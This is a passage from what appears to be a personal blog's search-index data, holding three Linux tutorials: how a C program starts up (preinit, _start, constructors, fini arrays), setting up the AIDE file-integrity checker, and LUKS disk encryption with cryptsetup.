As per the wikipedia page for loader(computing), It\u0026rsquo;s tasks include:\nvalidation (permissions, memory requirements etc.); copying the program image from the disk into main memory; copying the command-line arguments on the stack; initializing registers (e.g., the stack pointer); jumping to the program entry point (_start). But before getting to _start, it pre-initializes some global variables to help _start. You can create your custom preinit function as well. For this, you\u0026rsquo;ll need the constructor function. And yes, it is not C++ and it has a constructor and destructor. Every executable has a global C level constructor and destructor.\nThis is a code (unknown_functions.c) to change the preinit function with my own. I have added 3 printf() statements to preinit() (which should be easy to figure out in assembly now).. I\u0026rsquo;ll compile this code using gcc unknown_functions.c -o unknown_functions.out.\n#include \u0026lt;stdio.h\u0026gt; void preinit(int argc, char **argv, char **envp) { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); printf(\u0026#34;%d , %s , %s\\n\u0026#34;, argc, *argv, *envp); printf(\u0026#34;CLI arg : %s\\n\u0026#34;, argv[1]); } __attribute__((section(\u0026#34;.preinit_array\u0026#34;))) typeof(preinit) *__preinit = preinit; int main(int argc, char **argv, char **envp) { printf(\u0026#34;This is %s\\n\u0026#34;,__FUNCTION__); printf(\u0026#34;%d , %s , %s\\n\u0026#34;, argc, *argv, *envp); printf(\u0026#34;CLI arg : %s\\n\u0026#34;, argv[1]); return 0; } On running it with ./unknown_functions.out, I get some expected output.\npreinit 1 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : (null) This is main 1 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : (null) And we can also pass CLI argument to the binary like ./unknown_functions.out abcd1 and then it\u0026rsquo;ll give an output like this-\npreinit 2 , ./unknown_functions.out , 
ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : abcd1 This is main 2 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : abcd1 With this, we know that preinit function runs before main(). Let\u0026rsquo;s move forward with _start. This function is responsible for getting main() called by default. What if we replace this function with our custom function and never call main()?\nI am using below code(nomain.c) and compiling it with a (special flag this time) \u0026ndash; gcc nomain.c -nostartfiles -o nomain.out\n#include\u0026lt;stdio.h\u0026gt; #include\u0026lt;stdlib.h\u0026gt; // For declaration of exit() int my_fun(); // forward declaration, so _start can call it before its definition void _start() { int x = my_fun(); //calling custom main function exit(x); } int my_fun() // our custom main function { printf(\u0026#34;Surprise!!\\n\u0026#34;); return 0; } int main() { printf(\u0026#34;Not the main anymore\u0026#34;); return 0; } On running the binary ./nomain.out we get,\nSurprise!! To understand what just happened, we need to look into the disassembly of this binary. 
\u0026ndash; objdump -d nomain.out\nnomain.out: file format elf64-x86-64 Disassembly of section .plt: 0000000000001000 \u0026lt;.plt\u0026gt;: 1000:\tff 35 02 30 00 00 pushq 0x3002(%rip) # 4008 \u0026lt;_GLOBAL_OFFSET_TABLE_+0x8\u0026gt; 1006:\tff 25 04 30 00 00 jmpq *0x3004(%rip) # 4010 \u0026lt;_GLOBAL_OFFSET_TABLE_+0x10\u0026gt; 100c:\t0f 1f 40 00 nopl 0x0(%rax) 0000000000001010 \u0026lt;puts@plt\u0026gt;: 1010:\tff 25 02 30 00 00 jmpq *0x3002(%rip) # 4018 \u0026lt;puts@GLIBC_2.2.5\u0026gt; 1016:\t68 00 00 00 00 pushq $0x0 101b:\te9 e0 ff ff ff jmpq 1000 \u0026lt;.plt\u0026gt; 0000000000001020 \u0026lt;printf@plt\u0026gt;: 1020:\tff 25 fa 2f 00 00 jmpq *0x2ffa(%rip) # 4020 \u0026lt;printf@GLIBC_2.2.5\u0026gt; 1026:\t68 01 00 00 00 pushq $0x1 102b:\te9 d0 ff ff ff jmpq 1000 \u0026lt;.plt\u0026gt; 0000000000001030 \u0026lt;exit@plt\u0026gt;: 1030:\tff 25 f2 2f 00 00 jmpq *0x2ff2(%rip) # 4028 \u0026lt;exit@GLIBC_2.2.5\u0026gt; 1036:\t68 02 00 00 00 pushq $0x2 103b:\te9 c0 ff ff ff jmpq 1000 \u0026lt;.plt\u0026gt; Disassembly of section .text: 0000000000001040 \u0026lt;_start\u0026gt;: 1040:\t55 push %rbp 1041:\t48 89 e5 mov %rsp,%rbp 1044:\t48 83 ec 10 sub $0x10,%rsp 1048:\tb8 00 00 00 00 mov $0x0,%eax 104d:\te8 0d 00 00 00 callq 105f \u0026lt;my_fun\u0026gt; 1052:\t89 45 fc mov %eax,-0x4(%rbp) 1055:\t8b 45 fc mov -0x4(%rbp),%eax 1058:\t89 c7 mov %eax,%edi 105a:\te8 d1 ff ff ff callq 1030 \u0026lt;exit@plt\u0026gt; 000000000000105f \u0026lt;my_fun\u0026gt;: 105f:\t55 push %rbp 1060:\t48 89 e5 mov %rsp,%rbp 1063:\t48 8d 3d 96 0f 00 00 lea 0xf96(%rip),%rdi # 2000 \u0026lt;main+0xf8a\u0026gt; 106a:\te8 a1 ff ff ff callq 1010 \u0026lt;puts@plt\u0026gt; 106f:\tb8 00 00 00 00 mov $0x0,%eax 1074:\t5d pop %rbp 1075:\tc3 retq 0000000000001076 \u0026lt;main\u0026gt;: 1076:\t55 push %rbp 1077:\t48 89 e5 mov %rsp,%rbp 107a:\t48 8d 3d 8a 0f 00 00 lea 0xf8a(%rip),%rdi # 200b \u0026lt;main+0xf95\u0026gt; 1081:\tb8 00 00 00 00 mov $0x0,%eax 1086:\te8 95 ff ff ff callq 1020 
\u0026lt;printf@plt\u0026gt; 108b:\tb8 00 00 00 00 mov $0x0,%eax 1090:\t5d pop %rbp 1091:\tc3 retq This is pretty small as compared to the disassembly of simple.out. The reason is that we have replaced _start and not implemented any of the fancy startup functions in it. And this reduces the size of my binary as well.\n$ du nomain.out simple.out 16\tnomain.out 20\tsimple.out What after _start ?? Till now, we have seen that we can pass our values to loader and replace _start with our custom functions\u0026hellip; but this will not start __libc_start_main function.\nWhy do we need __libc_start_main to run??\n__libc_start_main is linked into our code from glibc. In general, it -\nhandles setuid and setgid program security problems. registers the init and fini arguments. calls the main function and exits with the return value of main. (This is something that we did in our custom function - nomain.c) This here is the definition for the __libc_start_main function which is implemented in the libc library.\nAs seen in the disassembly (of simple.out binary)\u0026hellip; while calling (callq) the __libc_start_main function\u0026hellip; we are passing main, __libc_csu_init and __libc_csu_fini\u0026hellip; along with other things.\n0000000000001040 \u0026lt;_start\u0026gt;: 1040:\tf3 0f 1e fa endbr64 1044:\t31 ed xor %ebp,%ebp 1046:\t49 89 d1 mov %rdx,%r9 1049:\t5e pop %rsi 104a:\t48 89 e2 mov %rsp,%rdx 104d:\t48 83 e4 f0 and $0xfffffffffffffff0,%rsp 1051:\t50 push %rax 1052:\t54 push %rsp 1053:\t4c 8d 05 76 01 00 00 lea 0x176(%rip),%r8 # 11d0 \u0026lt;__libc_csu_fini\u0026gt; 105a:\t48 8d 0d ff 00 00 00 lea 0xff(%rip),%rcx # 1160 \u0026lt;__libc_csu_init\u0026gt; 1061:\t48 8d 3d d1 00 00 00 lea 0xd1(%rip),%rdi # 1139 \u0026lt;main\u0026gt; 1068:\tff 15 72 2f 00 00 callq *0x2f72(%rip) # 3fe0 \u0026lt;__libc_start_main@GLIBC_2.2.5\u0026gt; 106e:\tf4 hlt 106f:\t90 nop What\u0026rsquo;s next??\nNext thing that executes is __libc_csu_init which 
will call all the initializing functions. This phase runs before the main() function. The sequence which is followed (roughly) by the __libc_csu_init function is:\n__init __gmon_start__ frame_dummy __do_global_ctors_aux C level global constructors init array We\u0026rsquo;ll add our custom C level global constructor and init array function in below code(pre-main.c)\u0026hellip;. and compile it with gcc pre-main.c -o pre-main.out.\n#include \u0026lt;stdio.h\u0026gt; void init(int argc, char **argv, char **envp) { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } void __attribute__ ((constructor)) constructor() { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } __attribute__((section(\u0026#34;.init_array\u0026#34;))) typeof(init) *__init = init; int main() { printf(\u0026#34;Hello main\u0026#34;); return 0; } This will give output as below\nconstructor init Hello main After main ?? As we have in the diagram, after main, exit function is called\u0026hellip; which calls multiple functions in the below order:-\natexit fini_array destructor. The below code(after-main.c) can be used to demonstrate that.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; // For declaration of atexit() void fini() { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } void __attribute__ ((destructor)) destructor() { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } __attribute__((section(\u0026#34;.fini_array\u0026#34;))) typeof(fini) *__fini = fini; void do_something_at_end() { printf(\u0026#34;Bye bye\\n\u0026#34;); } int main() { atexit(do_something_at_end); printf(\u0026#34;Hello main\\n\u0026#34;); return 0; } This will return the below output - which confirms the order of execution.\nHello main Bye bye fini destructor Here we can see that atexit() is called before printf(), but in the output the registered function\u0026rsquo;s message appears after the printf() message. The reason is that atexit() simply registers do_something_at_end to run at exit. It does not run it right away.\nThe end. 
This is pretty much what happens when we run an ELF binary or a C program in linux. In this article, I haven\u0026rsquo;t talked about a lot of other stuff that happens when a program executes\u0026hellip; like setting up the environments variable for the program, how the memory layout is done or what is procedure linkage table(plt), etc\u0026hellip;\nIf you find any information wrongly presented in this article, feel free to correct me. I am still learning this whole stuff and there are a lot of things yet to discover.\n","permalink":"https://ayedaemon.github.io/post/2022/01/debugging-c-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHow your x86 program starts up in linux\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Debugging C Code"},{"content":" Host-based intrusion detection system (HIDS) for checking the integrity of files.\nAdvanced Intrusion Detection Environment (AIDE) is a host-based intrusion detection system (HIDS) for checking the integrity of files. It does this by creating a baseline database of files on an initial run, and then checks this database against the system on subsequent runs. File properties that can be checked against include inode, permissions, modification time, file contents, etc……….. more at archwiki📚\nAccording to the definition, AIDE only checks for the integrity of file but not for rootkits and logs for other suspicious activities.\nBut there are other HIDS tools that can do this for you. Like, Splunk and OSSEC.\nAIDE have provided a pretty simple documentation to undertand and get familiar with it.\nHow to install it? # Check what repo will provide you aide tool. yum whatprovides aide # And then install it, if available. yum install aide -y Next step ..?? Let’s check the files unpacked from the aide package we just installed.\nWe found a configuration file — /etc/aide.conf.\n# open the file with vim or your favourite text editor vim /etc/aide.conf # The file looked very huge so I checked its length. 
wc /etc/aide.conf # OUTPUT: # 312 765 7333 /etc/aide.conf Fortunately they have given a man page for the configurations settings.\nman 5 aide.conf This gives me a good news. There are only 3 types of line in the configuration file.\nThere are the 1️⃣configuration lines which are used to set configuration parameters and define/undefine variables. There are 2️⃣selection lines that are used to indicate which files are added to the database. 3️⃣ macro lines define or undefine variables within the config file. Lines beginning with # are ignored as comments.#️⃣ You can now check the config file and things will make more sense to you. Also you can check the key-value pairs from man page.\nEnough for configuration… How to use it? Go to the man page of aide.\n# from terminal man aide Again a reminder, and I quote.\nAIDE is an intrusion detection system for checking the integrity of files.\nOne thing to notice here is DIAGNOSTICS (Scroll down to bottom on the man page).\nAnother is, that AIDE can be controlled using few basic commands.\nTime for some fun now!! Game-play\nCreate a folder and some files in it. Configure AIDE to add that folder in database. Have fun with the folder and files and check the AIDE logs for reports. Adding my new folder and files to aide.conf\n#-------------- My-Settings --------------- myfilter = sha256 /fun-with-aide myfilter This rule is a regular expression rule and will match the complete path of any file starting from /fun-with-aide, so this will include the files inside this folder.\nNow some simple steps to follow:\n* aide --init * cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz * aide --check What if we tinker with the file /fun-with-aide/file1?\nI have changed the content of the file1, due to which the sha256sum has also changed. This should be reported by aide in reports.\nThis generates a report that tells about the changes. 
I’ll get a count of added files, removed files and changed files, along with the names of those files and some detailed information.\nAIDE can be run manually if desired, but automation is the way nowadays.\nCheck the simple cron job script below, which automatically checks for changes. For more complex examples check this and this.\n# SOURCE: https://wiki.archlinux.org/index.php/AIDE #!/bin/bash -e # these should be the same as what\u0026#39;s defined in /etc/aide.conf database=/var/lib/aide/aide.db.gz database_out=/var/lib/aide/aide.db.new.gz if [ ! -f \u0026#34;$database\u0026#34; ]; then echo \u0026#34;$database not found\u0026#34; \u0026gt;\u0026amp;2 exit 1 fi aide -u || true mv \u0026#34;$database\u0026#34; \u0026#34;$database.back\u0026#34; mv \u0026#34;$database_out\u0026#34; \u0026#34;$database\u0026#34; What if an attacker changed the database??\nWhen I checked the file type of aide.db.gz\u0026hellip; it turned out to be gzip compressed data, from Unix, max compression.\nSo the obvious next step is to decompress it. I prefer the gunzip tool.\nThe specification of the db is also included in the file.\nVisualizing the above in a tabular manner.\nYou can add more filters and integrity checks to test other things as well.\nThis whole db thing gives rise to a question. What if the attacker modifies the db??\nHmmm.. then they win🤷‍♂️. You have to keep your db secure from attackers. For this, you should keep your database in read-only mode, so that it can only be read and cannot be modified. You can also keep the DB in a different location, like a centralized server or removable media such as a pen drive. Or you can have it your way.\nYou can read more about Integrity Concepts here for better security guidelines.\nConclusion In the end, let’s understand how AIDE does what it does.\nAIDE takes a “snapshot” of the state of the system, registering hashes, modification times, and other data regarding the files defined by the administrator.
This “snapshot” is used to build a database that is saved and may be stored on an external device for safekeeping.\nWhen the administrator wants to run an integrity test, the administrator places the previously built database in an accessible place and commands AIDE to compare the database against the real status of the system. Should a change have happened to the computer between the snapshot creation and the test, AIDE will detect it and report it to the administrator. Alternatively, AIDE can be configured to run on a schedule and report changes daily using scheduling technologies such as cron.🔚\n","permalink":"https://ayedaemon.github.io/post/2020/12/advanced-intrusion-detection-environment/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHost-based intrusion detection system (HIDS) for checking the integrity of files.\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Advanced Intrusion Detection Environment"},{"content":" Linux Unified Key Setup - Disk Encryption\ncryptsetup - manage plain dm-crypt and LUKS encrypted volumes\ncryptsetup \u0026lt;OPTIONS\u0026gt; \u0026lt;action\u0026gt; \u0026lt;action-specific-options\u0026gt; \u0026lt;device\u0026gt; \u0026lt;dmname\u0026gt; An encrypted blockdevice is protected by a key. A key is either:\na passphrase, or a keyfile What the..? Ok.. If you are new to the encryption world, then it’s time to get a bit familiar with data encryption.\nThere are 2 methods to encrypt your data:\nFilesystem stacked level encryption: Form of disk encryption where individual files or directories are encrypted by the file system itself. read more here Block device level encryption: The entire partition or disk, in which the file system resides, is encrypted. Before things get really technical and scary, let me show you how your data is stored on a harddisk.\nThe diagram above shows how your data is stored on a harddisk.\nYou create files (I am calling them data chunks) and put your data in them.
These files are stored in a very systematic and managed system called a File System. Partitions are formatted to carry a file system. Harddisks are divided into Partitions. (Wanna know why? Ask Leo!) Now that you know exactly how your data is stored on a harddisk, let’s see how block device level encryption works.\nHere, a new layer is added to the usual setup.\nWe attach a harddisk to our system. Create partitions on it. Encrypt the complete partition (make it password protected) 🔐 Create a filesystem (NTFS, EXT4, XFS, etc) on the encrypted partition. Write/save your data chunks. Just Do It now ✔️ Installing required tools I am using a RHEL based OS which uses yum/dnf package managers.\nyum install cryptsetup -y or dnf install -y cryptsetup Creating the partition lsblk - check the device name for the harddisk (sdb)\nfdisk - partitioning tool\nformatting with luks cryptsetup -y -v luksFormat /dev/sdb1 - encrypt the partition\nlsblk -f - check the encrypted partition\ncryptsetup -v luksOpen /dev/sdb1 myencrypt - map the encrypted partition to \u0026lsquo;myencrypt\u0026rsquo;.\nlsblk -f - check it\ncreating a file system mkfs.xfs /dev/mapper/myencrypt - create a file system on top of the encrypted partition.\nlsblk -f - Check the layering and filesystem associated.\ncreating a mountpoint mkdir -p /mnt/my_encrypted_backup mount -v /dev/mapper/myencrypt /mnt/my_encrypted_backup/\nIf you face such issues - SELinux labels blah blah blah\nType this in the magic terminal: restorecon -vvRF /mnt/my_encrypted_backup/ - This will restore the SELinux context back to defaults for the destination directory.\nChecking luks dumps cryptsetup luksDump /dev/sdb1 Adding new key mkdir /etc/luks-keys/; dd if=/dev/random of=/etc/luks-keys/mybackup_key bs=32 count=1 cryptsetup luksAddKey /dev/sdb1 /etc/luks-keys/mybackup_key Checking the dumps again\nNow there are 2 key slots in use.\nOne holds the initial passphrase I entered while setting it up. The other holds the key added in the step above.
At this particular moment, there are a few questions on my mind. You should know them too.\nIf you want to unmount and remove the harddisk, follow these steps: umount /mountpoints/sdb cryptsetup luksClose myencrypt If you want to open the luks partition with a keyfile instead of the passphrase: cryptsetup -v luksOpen /dev/sdb1 myencrypt --key-file=/etc/luks-keys/mybackup_key What if someone changes the content of the keyfile? Creating a new key\nAdd the key to the slots\nUse key\nSo the content of the keyfile does matter; you can’t change it and expect things to work just fine for you.\nTime for some Automation Get the UUID of the encrypted partition\nAnd make the entry below in the /etc/crypttab file. (Check the UUID for your device - Don\u0026rsquo;t copy mine!!)\nmyencrypt UUID=48a20857-6f26-4352-89d5-e778f2d98950 /etc/luks-keys/mybackup_key luks The above line is a combination of 4 fields:\nname of the mapped device. uuid of the encrypted partition keyfile to unlock the partition options, here the type of encryption used: luks And then make the entry below in the /etc/fstab file.\n/dev/mapper/myencrypt /mountpoints/sdb xfs defaults 0 0 Want to learn more about crypttab and fstab?\nThe last step is to verify that the above steps worked.\nRemount and verify (using the mount command with the \u0026lsquo;a\u0026rsquo; and \u0026lsquo;v\u0026rsquo; flags for clarity) Reboot the system and check if everything works after reboot. (Trust me, things sometimes betray you after a reboot) Want to read more about dm-crypt or device encryption?\n","permalink":"https://ayedaemon.github.io/post/2020/12/luks-disk-encryption/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLinux Unified Key Setup - Disk Encryption\u003c/p\u003e\n\u003c/blockquote\u003e","title":"LUKS Disk Encryption"}]